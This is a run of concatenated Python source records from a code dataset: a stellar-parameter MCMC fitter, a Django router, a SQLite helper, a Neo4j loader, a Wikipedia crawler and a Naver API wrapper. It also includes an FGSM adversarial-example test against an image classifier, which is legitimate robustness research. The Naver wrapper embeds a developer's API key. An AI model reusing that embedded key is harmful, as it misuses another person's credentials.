SKIPPING\")\n continue\n else:\n key = f\"wdFlux_{band}\"\n if band not in systems:\n msg = f\"No photometric system for {band}, skipping\"\n LOGFILE.write(msg + \"\\n\")\n print(msg)\n continue\n\n system = PhotometricSystem(systems[band])\n mean, _, std = sigma_clipped_stats(chain[key])\n flx = Flux(mean, std, system, band, syserr=syserr)\n print(f\"{band} = {flx}\")\n LOGFILE.write(f\"{band} = {flx}\")\n fluxes.append(flx)\n\n while True:\n print(\"Would you like to add another flux?\")\n cont = input(\"y/n: \")\n if cont.lower() == \"y\":\n print(\"Enter a band:\")\n band = input(\"> \")\n print(\"Enter a photometric system:\")\n system = input(\"> \")\n print(\"Enter a Flux, in mJy\")\n flx = input(\"> \")\n print(\"Enter an error on flux, mJy\")\n fle = input(\"> \")\n\n flx = float(flx)\n fle = float(fle)\n system = PhotometricSystem(system)\n\n flux = Flux(flx, fle, system, band, syserr=syserr)\n fluxes.append(flux)\n else:\n print(\"Done!\")\n break\n\n # Create the model object\n myModel = WDModel(teff, logg, plax, ebv, fluxes)\n npars = myModel.npars\n\n if toFit:\n guessP = np.array(myModel)\n nameList = [\"Teff\", \"log_g\", \"Parallax\", \"E(B-V)\"]\n\n # mp.set_start_method(\"spawn\")\n pool = mp.Pool(nthread)\n p0 = initialise_walkers(guessP, scatter, nwalkers, ln_prior, myModel)\n sampler = emcee.EnsembleSampler(\n nwalkers,\n npars,\n ln_prob,\n args=(myModel,),\n pool=pool,\n )\n\n # burnIn\n pos, prob, state = run_burnin(sampler, p0, nburn)\n\n # production\n sampler.reset()\n col_names = \"walker_no \" + \" \".join(nameList) + \" ln_prob\"\n sampler = run_mcmc_save(\n sampler, pos, nprod, state, \"chain_wd.txt\", col_names=col_names\n )\n # Collect results from all walkers\n fchain = flatchain(sampler.chain, npars, thin=thin)\n\n # Plot the likelihoods\n likes = sampler.chain[..., -1]\n\n # Plot the mean likelihood evolution\n like_mu = np.mean(likes, axis=0)\n like_std = np.std(likes, axis=0)\n steps = np.arange(likes.shape[1])\n std = np.std(likes)\n\n # Make the likelihood plot\n fig, ax = plt.subplots(figsize=(11, 8))\n ax.fill_between(\n steps, like_mu - like_std, like_mu + like_std, color=\"red\", alpha=0.4\n )\n ax.plot(steps, like_mu, color=\"green\")\n\n ax.set_xlabel(\"Step\")\n ax.set_ylabel(\"ln_prob\")\n\n plt.tight_layout()\n plt.savefig(\"wdparams_likelihoods.pdf\")\n plt.close(\"all\")\n\n bestPars = []\n print(fchain.shape)\n for i in range(npars):\n par = fchain[:, i]\n lolim, best, uplim = np.percentile(par, [16, 50, 84])\n myModel[i] = best\n\n print(\"%s = %f +%f -%f\" % (nameList[i], best, uplim - best, best - lolim))\n bestPars.append(best)\n print(\"Creating corner plots...\")\n fig = thumbPlot(fchain, nameList)\n fig.savefig(\"wdparams_cornerPlot.pdf\")\n plt.close(\"all\")\n else:\n bestPars = [par for par in myModel]\n\n print(\"Done!\")\n print(\"Chisq = {:.3f}\".format(myModel.chisq()))\n # Plot measured and model colors and fluxes\n plotFluxes(myModel)\n print(\"Model: {}\".format(myModel))\n LOGFILE.close()\n","sub_path":"wdparams.py","file_name":"wdparams.py","file_ext":"py","file_size_in_byte":22678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"31187436","text":"import tensorflow as tf\nimport numpy as np\nimport os\n\nfrom keras.datasets.cifar10 import load_data\n\nfrom ares import FGSM, CrossEntropyLoss\nfrom ares.model.loader import load_model_from_path\n\nbatch_size = 100\n\nsession = tf.Session()\n\nmodel_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 
'../example/cifar10/resnet56.py')\nrs_model = load_model_from_path(model_path)\nmodel = rs_model.load(session)\n\n_, (xs_test, ys_test) = load_data()\nxs_test = (xs_test / 255.0) * (model.x_max - model.x_min) + model.x_min\nys_test = ys_test.reshape(len(ys_test))\n\nxs_ph = tf.placeholder(model.x_dtype, shape=(batch_size, *model.x_shape))\nlgs, lbs = model.logits_and_labels(xs_ph)\n\nloss = CrossEntropyLoss(model)\nattack = FGSM(\n model=model,\n batch_size=batch_size,\n loss=loss,\n goal='ut',\n distance_metric='l_inf',\n session=session\n)\nattack.config(magnitude=8.0 / 255.0)\n\nfor hi in range(batch_size, 5 * batch_size, batch_size):\n xs = xs_test[hi - batch_size:hi]\n ys = ys_test[hi - batch_size:hi]\n\n xs_adv = attack.batch_attack(xs, ys=ys)\n\n lbs_pred = session.run(lbs, feed_dict={xs_ph: xs})\n lbs_adv = session.run(lbs, feed_dict={xs_ph: xs_adv})\n\n print(\n np.equal(ys, lbs_pred).astype(np.float).mean(),\n np.equal(ys, lbs_adv).astype(np.float).mean()\n )\n\nattack.config(\n magnitude=np.concatenate((np.ones(50) * 1.0 / 255.0, np.ones(50) * 8.0 / 255.0)),\n)\n\nfor hi in range(batch_size, 5 * batch_size, batch_size):\n xs = xs_test[hi - batch_size:hi]\n ys = ys_test[hi - batch_size:hi]\n\n xs_adv = attack.batch_attack(xs, ys, None)\n\n lbs_pred = session.run(lbs, feed_dict={xs_ph: xs})\n lbs_adv = session.run(lbs, feed_dict={xs_ph: xs_adv})\n\n print(\n np.equal(ys, lbs_pred).astype(np.float).mean(),\n np.equal(ys, lbs_adv).astype(np.float).mean()\n )\n","sub_path":"test/test_fgsm.py","file_name":"test_fgsm.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"229457633","text":"import sqlite3\nfrom models.hero import Hero\nfrom models.talent import Talent\nfrom models.ability import Ability\nfrom models.affect import Affect\n\nclass DbHelper(object):\n def __init__(self, db_path='HotsTalents.sqlite'):\n self.connection = sqlite3.connect(db_path)\n\n def close(self):\n if self.connection:\n self.connection.close()\n\n def get_hero_list(self):\n result = []\n query = 'SELECT name FROM heroes'\n cursor = self.connection.cursor()\n rows = cursor.execute(query).fetchall()\n cursor.close()\n for row in rows:\n result.append(row[0])\n return result\n\n def find_hero_by_name(self, name):\n query = 'SELECT * FROM heroes WHERE name=?'\n\n return self.hero_from_row(self.fetch_row_by_key(query, name))\n\n def get_talent_list(self, hero_id):\n result = []\n query = 'SELECT * FROM talents WHERE hero_id=?'\n rows = self.fetch_list_by_key(query, hero_id)\n for row in rows:\n result.append(self.talent_from_row(row))\n return result\n\n def get_ability_list(self, hero_id):\n result = []\n query = 'SELECT * FROM ability WHERE hero=?'\n rows = self.fetch_list_by_key(query, hero_id)\n for row in rows:\n result.append(self.ability_from_row(row))\n return result\n\n def create_hero(self, hero):\n hero.id = self.get_next_hero_id()\n query = 'INSERT INTO heroes VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)'\n cursor = self.connection.cursor()\n cursor.execute(query, (hero.id, hero.name, hero.hero_type, hero.range, hero.base_hp, hero.base_mana,\n hero.base_hp_regen, hero.base_mana_regen, hero.base_speed, hero.base_attack,\n hero.base_attack_speed, hero.splash_attack, hero.portrait, hero.larger_protrait,\n hero.hero_image, hero.level_hp, hero.level_mana, hero.level_hp_regen,\n hero.level_mana_regen, hero.level_attack, hero.level_splash_attack))\n self.connection.commit()\n cursor.close()\n return 
hero\n\n def update_hero(self, hero):\n hero.id = self.get_hero_id(hero)\n query = 'UPDATE heroes SET hero_type=?, range=?, base_hp=?, base_mana=?, base_hp_regen=?, base_mana_regen=?, ' \\\n 'base_speed=?, base_attack=?, base_attack_speed=?, splash_attack=?, portrait_id=?, larger_portrait_id=?,' \\\n ' hero_image_id=?, level_hp=?, level_mana=?, level_hp_regen=?, level_mana_regen=?, level_attack=?, ' \\\n 'level_splash_attack=? WHERE _id=?'\n cursor = self.connection.cursor()\n cursor.execute(query, (hero.hero_type, hero.range, hero.base_hp, hero.base_mana, hero.base_hp_regen,\n hero.base_mana_regen, hero.base_speed, hero.base_attack, hero.base_attack_speed,\n hero.splash_attack, hero.portrait, hero.larger_protrait, hero.hero_image, hero.level_hp,\n hero.level_mana, hero.level_hp_regen, hero.level_mana_regen, hero.level_attack,\n hero.level_splash_attack, hero.id))\n self.connection.commit()\n cursor.close()\n\n def get_next_hero_id(self):\n query = 'SELECT max(_id) FROM heroes'\n cursor = self.connection.cursor()\n result = cursor.execute(query).fetchone()[0]\n cursor.close()\n return result+1\n\n def get_next_ability_id(self):\n query = 'SELECT max(_id) FROM ability'\n cursor = self.connection.cursor()\n result = cursor.execute(query).fetchone()[0]\n cursor.close()\n return result+1\n\n def get_next_talent_id(self):\n query = 'SELECT max(_id) FROM talents'\n cursor = self.connection.cursor()\n result = cursor.execute(query).fetchone()[0]\n cursor.close()\n return result+1\n\n def get_hero_id(self, hero):\n query = 'SELECT _id FROM heroes WHERE name=?'\n cursor = self.connection.cursor()\n cursor.execute(query, (hero.name,))\n result = cursor.fetchone()[0]\n cursor.close()\n return result\n\n def get_talent_by_id(self, talent_id):\n query = 'SELECT * FROM talents WHERE _id=?'\n return self.talent_from_row(self.fetch_row_by_key(query, talent_id))\n\n def get_ability_by_id(self, ability_id):\n query = 'SELECT * FROM ability WHERE _id=?'\n return self.ability_from_row(self.fetch_row_by_key(query, ability_id))\n\n def get_affects_by_talent(self, talent_id):\n result = []\n query = 'SELECT * FROM talent_affect WHERE talent_id=?'\n rows = self.fetch_list_by_key(query, talent_id)\n for row in rows:\n affect = Affect()\n affect.affecting_talent = self.get_talent_by_id(talent_id)\n if row[2] is not None:\n affect.affected_ability = self.get_ability_by_id(row[2])\n if row[3] is not None:\n affect.affected_talent = self.get_talent_by_id(row[3])\n result.append(affect)\n return result\n\n def delete_ability(self, ability):\n query = 'DELETE FROM ability WHERE _id=?'\n self.execute_query_with_key(query, ability.id, True)\n\n def delete_talent(self, talent):\n delete_affects_query = 'DELETE FROM talent_affect WHERE talent_id=?'\n self.execute_query_with_key(delete_affects_query, talent.id, True)\n delete_talent_query = 'DELETE FROM talents WHERE _id=?'\n self.execute_query_with_key(delete_talent_query, talent.id, True)\n\n def add_ability(self, ability):\n query = 'INSERT INTO ability VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)'\n ability.id = self.get_next_ability_id()\n if ability.is_trait:\n is_trait = 1\n else:\n is_trait = 0\n self.execute_query_with_key(query, (ability.id, ability.name,\n ability.hero_id, ability.icon, ability.description,\n ability.mana_cost, ability.cooldown, ability.duration,\n is_trait), True)\n return ability\n\n def add_talent(self, talent):\n query = 'INSERT INTO talents VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'\n talent.id = self.get_next_talent_id()\n if talent.is_usable:\n 
is_usable = 1\n else:\n is_usable = 0\n self.execute_query_with_key(query, (talent.id, talent.name, talent.hero_id,\n talent.icon, talent.description, talent.mana_cost,\n talent.cooldown, talent.duration, talent.sort_order,\n talent.level_required, is_usable), True)\n return talent\n\n def update_talent(self, talent):\n if talent.is_usable:\n is_usable = 1\n else:\n is_usable = 0\n query = 'UPDATE talents SET name=?, icon=?, description=?, mana_cost=?, cooldown=?, duration=?, sort_order=?, ' \\\n 'level_required=?, is_usable=? WHERE _id=?'\n self.execute_query_with_key(query, (talent.name, talent.icon, talent.description, talent.mana_cost,\n talent.cooldown, talent.duration, talent.sort_order, talent.level_required,\n is_usable, talent.id), True)\n\n def update_ability(self, ability):\n if ability.is_trait:\n is_trait = 1\n else:\n is_trait = 0\n query = 'UPDATE ability SET name=?, icon=?, description=?, mana_cost=?, cooldown=?, duration=?, is_trait=? ' \\\n 'WHERE _id=?'\n self.execute_query_with_key(query, (ability.name, ability.icon, ability.description, ability.mana_cost,\n ability.cooldown, ability.duration, is_trait, ability.id), True)\n\n def update_affects(self, affect_list, skill):\n delete_affects = 'DELETE FROM talent_affect WHERE talent_id=?'\n new_affects = 'INSERT INTO talent_affect(talent_id, affected_ability_id, affected_talent_id) VALUES(?, ?, ?)'\n self.execute_query_with_key(delete_affects, skill.id, True)\n for affect in affect_list:\n if affect.affected_ability is None:\n ability = None\n else:\n ability = affect.affected_ability.id\n if affect.affected_talent is None:\n talent = None\n else:\n talent = affect.affected_talent.id\n if talent is None and ability is None:\n continue\n self.execute_query_with_key(new_affects, (affect.affecting_talent.id, ability, talent), True)\n\n def execute_query_with_key(self, query, key, commit=False):\n cursor = self.connection.cursor()\n if isinstance(key, tuple):\n cursor.execute(query, key)\n else:\n cursor.execute(query, (key, ))\n if commit:\n self.connection.commit()\n cursor.close()\n\n def fetch_row_by_key(self, query, key):\n cursor = self.connection.cursor()\n if isinstance(key, tuple):\n cursor.execute(query, key)\n else:\n cursor.execute(query, (key, ))\n row = cursor.fetchone()\n cursor.close()\n return row\n\n def fetch_list_by_key(self, query, key):\n cursor = self.connection.cursor()\n cursor.execute(query, (key, ))\n rows = cursor.fetchall()\n cursor.close()\n return rows\n\n @staticmethod\n def talent_from_row(row):\n talent = Talent()\n talent.id = row[0]\n talent.name = row[1]\n talent.hero_id = row[2]\n talent.icon = row[3]\n talent.description = row[4]\n talent.mana_cost = row[5]\n talent.cooldown = row[6]\n talent.duration = row[7]\n talent.sort_order = row[8]\n talent.level_required = row[9]\n if row[10] > 0:\n talent.is_usable = True\n else:\n talent.is_usable = False\n return talent\n\n @staticmethod\n def ability_from_row(row):\n ability = Ability()\n ability.id = row[0]\n ability.name = row[1]\n ability.hero_id = row[2]\n ability.icon = row[3]\n ability.description = row[4]\n ability.mana_cost = row[5]\n ability.cooldown = row[6]\n ability.duration = row[7]\n if row[8] is not None and row[8] > 0:\n ability.is_trait = True\n else:\n ability.is_trait = False\n return ability\n\n @staticmethod\n def hero_from_row(row):\n result = Hero()\n result.id = row[0]\n result.name = row[1]\n result.hero_type = row[2]\n result.range = row[3]\n result.base_hp = row[4]\n result.base_mana = row[5]\n result.base_hp_regen = 
row[6]\n result.base_mana_regen = row[7]\n result.base_speed = row[8]\n result.base_attack = row[9]\n result.base_attack_speed = row[10]\n result.splash_attack = row[11]\n result.portrait = row[12]\n result.larger_protrait = row[13]\n result.hero_image = row[14]\n result.level_hp = row[15]\n result.level_mana = row[16]\n result.level_hp_regen = row[17]\n result.level_mana_regen = row[18]\n result.level_attack = row[19]\n result.level_splash_attack = row[20]\n\n return result","sub_path":"db_helper.py","file_name":"db_helper.py","file_ext":"py","file_size_in_byte":11487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286825184","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport journal.views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n\turl(r'^journal/', include('journal.urls')),\n\turl(r'^accounts/', include('accounts.urls')),\n\turl(r'^$', include('journal.urls')),\n)\n","sub_path":"running_journal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191309562","text":"from decimal import Decimal as D\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\nfrom oscar.core.loading import get_model\nfrom oscar.test import factories\nimport mock\n\nfrom .base import BaseTest\nfrom . import responses\n\nAccount = get_model('oscar_accounts', 'Account')\n\n\nclass CheckoutTest(BaseTest):\n \"\"\"Full Integration Test of Checkout\"\"\"\n\n @mock.patch('soap.get_transport')\n def test_checkout_authd(self, get_transport):\n \"\"\"Full checkout process using minimal api calls\"\"\"\n get_transport.return_value = self._build_transport_with_reply(responses.transaction_successful)\n\n user = User.objects.create_user(username='joe', password='schmoe')\n self.client.login(username='joe', password='schmoe')\n\n product = self._create_product()\n\n res = self._get_basket()\n self.assertEqual(res.status_code, 200)\n basket_id = res.data['id']\n\n res = self._add_to_basket(product.id)\n self.assertEqual(res.status_code, 200)\n\n account = self._build_account('9999999999999999')\n account.primary_user = user\n account.save()\n\n resp = self._checkout(basket_id, account)\n self.assertEqual(resp.data['total_incl_tax'], '10.00')\n\n self.assertEqual(resp.data['shipping_method'], 'Free shipping')\n\n\n def _create_product(self, price=D('10.00')):\n product = factories.create_product(\n title='My Product',\n product_class='My Product Class')\n record = factories.create_stockrecord(\n currency='USD',\n product=product,\n num_in_stock=10,\n price_excl_tax=price)\n factories.create_purchase_info(record)\n return product\n\n def _get_basket(self):\n url = reverse('api-basket')\n return self.client.get(url)\n\n def _add_to_basket(self, product_id, quantity=1):\n url = reverse('api-basket-add-product')\n data = {\n \"url\": reverse('product-detail', args=[product_id]),\n \"quantity\": quantity\n }\n return self.client.post(url, data)\n\n def _checkout(self, basket_id, account):\n data = {\n \"guest_email\": \"herp@example.com\",\n \"basket\": reverse('basket-detail', args=[basket_id]),\n \"wfrs_source_account\": account.pk,\n \"shipping_address\": {\n \"first_name\": \"Joe\",\n \"last_name\": \"Schmoe\",\n \"line1\": \"234 5th Ave\",\n \"line4\": \"Manhattan\",\n 
\"postcode\": \"10001\",\n \"state\": \"NY\",\n \"country\": reverse('country-detail', args=['US']),\n \"phone_number\": \"+1 (717) 467-1111\",\n }\n }\n url = reverse('wfrs-api-checkout')\n res = self.client.post(url, data, format='json')\n self.assertEqual(res.status_code, 200)\n return res\n","sub_path":"wellsfargo/tests/test_api_checkout.py","file_name":"test_api_checkout.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"447280603","text":"from distutils.core import setup\n\nwith open('requirements.txt') as file:\n required = file.read().splitlines()\n\nsetup(\n name='pypiWrapper',\n version='0.1.1',\n packages=['pypiWrapper'],\n license='MIT',\n author='Niek Keijzer',\n author_email='info@niekkeijzer.com',\n description='Wrapper for PyPI API',\n url='https://github.com/NiekKeijzer/pypiWrapper',\n download_url='https://github.com/NiekKeijzer/pypiWrapper/tarball/0.1.1',\n keywords=\"pypi json api wrapper\",\n install_requires=required\n)\n","sub_path":"pypi_install_script/pypiWrapper-0.1.1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"41627553","text":"import urllib\nimport elementtree.ElementTree as ET\n\n# http://openapi.naver.com/\nclass NaverOpenAPI(object):\n\n # Seo Sanghyeon's key. Naver ID sanxiyn.\n defaultKey = 'b2730786365fd6614977e2a4ae265b91'\n\n def __init__(self, key=None):\n if key:\n self.key = key\n else:\n self.key = self.defaultKey\n\n # http://openapi.naver.com/page.nhn?PageId=1_06\n def book(self, isbn):\n query = {}\n query['key'] = self.key\n query['target'] = 'book_adv'\n query['query'] = ''\n query['d_isbn'] = isbn\n url = 'http://openapi.naver.com/search?' 
+ urllib.urlencode(query)\n tree = ET.parse(urllib.urlopen(url))\n element = tree.find('channel/item')\n if element is not None:\n return NaverBook(element)\n\nclass NaverBook(object):\n\n def __init__(self, element):\n self.element = element\n\n def get(self, tagname):\n element = self.element.find(tagname)\n if element is not None:\n return element.text.strip()\n\n def cover(self):\n return self.get('image')\n\n def title(self):\n return self.get('title')\n\n def date(self):\n pubdate = self.get('pubdate')\n pubyear = pubdate[:4]\n return pubyear\n\n def publication(self):\n publisher = self.get('publisher')\n pubyear = self.date()\n publication = '%s (%s)' % (publisher, pubyear)\n return publication\n","sub_path":"naver.py","file_name":"naver.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641193103","text":"from .node_base import Node_Base\n\nfrom homie.node.property.property_datetime import Property_DateTime\n\n\nclass Node_DateTime(Node_Base):\n def __init__(\n self,\n device,\n id=\"datetime\",\n name=\"DateTime\",\n type_=\"datetime\",\n retain=True,\n qos=1,\n set_datetime=None,\n ):\n super().__init__(device, id, name, type_, retain, qos)\n\n assert set_datetime # must provide a function to set the value of the datetime\n\n self.add_property(Property_DateTime(self, set_value=set_datetime))\n\n def update_datetime(self, dt):\n self.get_property(\"datetime\").value = dt\n\n","sub_path":"homie/node/node_datetime.py","file_name":"node_datetime.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"9480239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8\n# ----------------------------------------------------------------------\n# Label sentences\n# ----------------------------------------------------------------------\n# Ivan Vladimir Meza-Ruiz/ ivanvladimir at turing.iimas.unam.mx\n# 2017/IIMAS/UNAM\n# ----------------------------------------------------------------------\n\n# System libraries\nimport argparse\nimport os.path\nimport re\nfrom tinydb import TinyDB, Query\nimport xml.etree.ElementTree as ET\nfrom collections import Counter, OrderedDict\nimport json\nfrom py2neo import Graph, Node, Relationship\nimport config\nimport sys\n\nre_year = re.compile(\"\\d\\d\\d\\d\")\nre_pais = re.compile(r\".*\\.([^.]*)$\")\n\n\nclass fg:\n BLACK = '\\033[30m'\n RED = '\\033[31m'\n GREEN = '\\033[32m'\n YELLOW = '\\033[33m'\n BLUE = '\\033[34m'\n MAGENTA = '\\033[35m'\n CYAN = '\\033[36m'\n WHITE = '\\033[37m'\n RESET = '\\033[39m'\n\n\nclass bg:\n BLACK = '\\033[40m'\n RED = '\\033[41m'\n GREEN = '\\033[42m'\n YELLOW = '\\033[43m'\n BLUE = '\\033[44m'\n MAGENTA = '\\033[45m'\n CYAN = '\\033[46m'\n WHITE = '\\033[47m'\n RESET = '\\033[49m'\n\n\nclass style:\n BRIGHT = '\\033[1m'\n DIM = '\\033[2m'\n NORMAL = '\\033[22m'\n RESET = '\\033[0m'\n\n\n\n\n\ndef build_graph(data,id2title):\n nodes=[]\n nodes_={}\n for idd,(name,node) in enumerate(data[0].items()):\n if 'type' in node and node['type']==\"institution\":\n continue\n nodes.append({\"name\":name,\n \"id\":idd,\n \"type\":2})\n for k,v in node.items():\n nodes[-1][k]=v\n\n nodes_[name]=idd\n\n len_nodes=len(nodes)\n for idd,(name,node) in enumerate(data[2].items()):\n if 'type' in node and node['type']==\"institution\":\n continue\n bits=name.split(\":\",2)\n nodes.append({\"name\":name,\n \"doc\":bits[0],\n \"art\":bits[1],\n 
\"id\":idd+len_nodes,\n \"type\":3})\n nodes_[name]=idd+len_nodes\n\n links=[]\n linked = set()\n for d1,c in data[1].items():\n for d2,val in c.items():\n if val > 0:\n ori_val=val\n tpe = \"normal\"\n if d2[1]==\"case_cidh\":\n target=nodes_[id2title[d2[0]]]\n val=val*50\n tpe = \"cidh\"\n else:\n target=nodes_[d2[0]]\n links.append({\"source\":nodes_[d1],\n \"target\":target,\n \"value\":val,\n \"ori_val\":ori_val,\n \"type\": tpe\n })\n linked.add(nodes_[d1])\n linked.add(target)\n\n for d1,c in data[3].items():\n for d2,val in c.items():\n if val > 0:\n ori_val=val\n tpe = \"artcle\"\n target=nodes_[\"{0}:{1}\".format(d2[0],d2[2])]\n links.append({\"source\":nodes_[d1],\n \"target\":target,\n \"value\":val,\n \"ori_val\":ori_val,\n \"type\": tpe\n })\n linked.add(nodes_[d1])\n linked.add(target)\n\n for node in nodes:\n if not 'id' in node:\n print(node)\n\n return None\n\ndef get_info_node(doc,artn=None):\n if artn:\n return (\n doc.attrib['name'],\n doc.attrib['type'],\n artn\n )\n else:\n return (\n doc.attrib['name'],\n doc.attrib['type']\n )\n\n\ndef extract_graph(root,graph,case,data):\n node_case=Node(\"Case\",**data[0][case['title']])\n graph.create(node_case)\n for par in root.findall('.//paragraph'):\n # Shows some labelling in the document\n for doc in par.findall('.//DocumentMention'):\n if not doc.attrib['type']==\"case_cidh\":\n node_document=Node(\"Document\",**doc.attrib)\n graph.create(node_document)\n cite=Relationship(node_case,'CITES',node_document)\n graph.create(cite)\n\n for art in par.findall('.//ArticleMention[@document=\"{0}\"]'\n .format(doc.attrib['id'])):\n for artn in art.attrib['articles'].split():\n node_article=Node(\"Article\",**art.attrib)\n graph.create(node_article)\n mention=Relationship(node_document,'MENTION',node_article)\n graph.create(mention)\n\n return data\n\n# MAIN\nif __name__ == \"__main__\":\n # Command line options\n p = argparse.ArgumentParser(description=\"Extract articles\")\n p.add_argument(\"--re_selector\",\n default=\".*\", type=str, action=\"store\", dest=\"re_selector\",\n help=\"Regex to select files\")\n p.add_argument(\"--labelled_dir\",\n default=\"data/labelledDocuments\", type=str,\n action=\"store\", dest=\"labelled_dir\",\n help=\"Directory with the annotated documents\")\n p.add_argument(\"--graph\",\n default=\"bolt://127.0.0.1:7687\", type=str,\n action=\"store\", dest=\"graph\",\n help=\"Graph db\")\n p.add_argument(\"--dbname\",\n default=\"data/DB.json\", type=str,\n action=\"store\", dest=\"dbname\",\n help=\"Name for the db file\")\n p.add_argument(\"-n\", \"--new\",\n action=\"store_true\", dest=\"new\",\n help=\"New graph [Off]\")\n p.add_argument(\"-v\", \"--verbose\",\n action=\"store_true\", dest=\"verbose\",\n help=\"Verbose mode [Off]\")\n\n # Parsing command line arguments\n args = p.parse_args()\n\n # Defining verbose function\n if args.verbose:\n def verbose(*args):\n print(args[0], end=\"\", sep=\"\")\n print(args[1], end=\"\", sep=\"\")\n print(style.NORMAL, end=\"\")\n for a in args[2:]:\n print(a, end=\"\")\n print(style.RESET)\n else:\n def verbose(*args):\n return None\n\n # Loading graph\n graph = Graph(args.graph, auth=(config.NEO4J_USER, config.NEO4J_PASSWORD))\n\n\n # Connecting to DB\n verbose(style.BRIGHT, \"Connecting to DB: \", args.dbname)\n db = TinyDB(args.dbname)\n contensiosos = db.table('contensiosos')\n\n re_selector = re.compile(args.re_selector)\n\n # Initialization counting\n Filter = Query()\n\n # load graph into data\n 
data=(OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict())\n\n # Populate data with names\n filter_new_cases=set()\n id2title={}\n for idd,case in enumerate(contensiosos.search(Filter.title.search(re_selector))):\n if case['title'] in data[0]:\n continue\n filter_new_cases.add(case['title'])\n m = re_year.search(case['title'])\n if m:\n year=m.group(0)\n m=re_pais.match(case['meta_name']['name'])\n pais=\"unknown\"\n if m:\n pais=m.group(1).strip()\n data[0][case['title']]={'year':year}\n data[0][case['title']]['type']=1\n data[0][case['title']]['case_id']=case.doc_id\n data[0][case['title']]['country']=pais.lower()\n data[0][case['title']]['name']=case['meta_name']['name']\n id2title[str(case.doc_id)]=case['title']\n\n graph.delete_all()\n\n for case in contensiosos.search(Filter.title.search(re_selector)):\n if case['title'] not in filter_new_cases:\n continue\n # Loading the XML file\n xmlinfilename = os.path.join(args.labelled_dir,\n os.path.basename(case['txt']) + \".xml\")\n verbose(style.BRIGHT, 'Analysing ', case['txt'])\n verbose(style.BRIGHT, 'Looking for ', xmlinfilename)\n try:\n with open(xmlinfilename, \"r\") as file:\n xmltxt = file.read()\n root = ET.fromstring('\\n'+xmltxt+\"\\n\")\n except FileNotFoundError:\n verbose(fg.RED + 'MISSING FILE: ', style.NORMAL, xmlinfilename)\n continue\n\n data=extract_graph(root,graph,case,data)\n\n","sub_path":"src/python/label_neo4j.py","file_name":"label_neo4j.py","file_ext":"py","file_size_in_byte":8237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"281495381","text":"import urllib\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nSTART_URL = \"https://en.wikipedia.org/wiki/Special:Random\"\nTARGET_URL = \"https://en.wikipedia.org/wiki/Philosophy\"\n\ndef paragraph(tag):\n \"\"\"Returns True if an element defines a paragraph containing at least one <i> or <a> tag\n that is its direct descendant.\"\"\"\n return tag.name == \"p\" and tag.find([\"i\", \"a\"], recursive=False)\n\ndef info_link(tag):\n \"\"\"Returns True if an element defines a hyperlink directing to an information page.\"\"\"\n return (tag.has_attr('href') and tag.attrs['href'].startswith('/wiki/Help')) and tag.parent.name == \"p\"\n\ndef italic_string(tag):\n \"\"\"Returns True if an element defines an italic string in a paragraph.\"\"\"\n return (tag.name == \"i\" and tag.parent.name == \"p\") and (not tag.find(True) or tag.b)\n\ndef find_first_link(url):\n \"\"\"Returns the first link in a Wikipedia article as a string,\n or returns None if there is no link.\n \"\"\"\n headers = {'User-Agent': 'Mozilla/5.0'}\n response = requests.get(url, headers=headers)\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n\n # the article's body is nested in two div tags\n content_div = soup.find(id=\"mw-content-text\").find(class_=\"mw-parser-output\")\n\n # stores the first link found in the article\n # if the article contains no links, this value will remain None\n article_link = None\n\n # Delete specified elements from the parse tree\n for element in content_div.find_all([info_link, italic_string]):\n element.decompose()\n\n # Find all the direct descendants of content_div that are paragraphs\n for p in content_div.find_all(paragraph, recursive=False):\n # Find the first anchor tag / anchor tag wrapped with an <i> tag\n # that is a direct descendant of a paragraph\n tag = p.find([\"i\", \"a\"], recursive=False)\n # Get the URL\n article_link = tag.a.get('href') if tag.a else tag.get('href')\n 
break\n\n if not article_link:\n return\n\n # Build a full URL from the relative article_link URL\n first_link = urllib.parse.urljoin('https://en.wikipedia.org/', article_link)\n\n return first_link\n\ndef continue_crawl(search_history, target_url, max_steps=25):\n if search_history[-1] == target_url:\n print(\"\\nWe've found the target article!\")\n return False\n elif len(search_history) > max_steps:\n print(\"\\nThe search has gone on suspiciously long, aborting search!\")\n return False\n elif len(search_history) != len(set(search_history)):\n print(\"\\nWe've arrived at an article we've already seen, aborting search!\")\n return False\n else:\n return True\n\narticle_chain = [START_URL]\n\nwhile continue_crawl(article_chain, TARGET_URL):\n print(article_chain[-1])\n\n # Download html of the last article in article_chain\n # Find the first link in that html\n first_link = find_first_link(article_chain[-1])\n\n if not first_link:\n print(\"We've arrived at an article with no links, aborting search!\")\n break\n\n # Add the first link to the article chain\n article_chain.append(first_link)\n # Delay for about two seconds\n 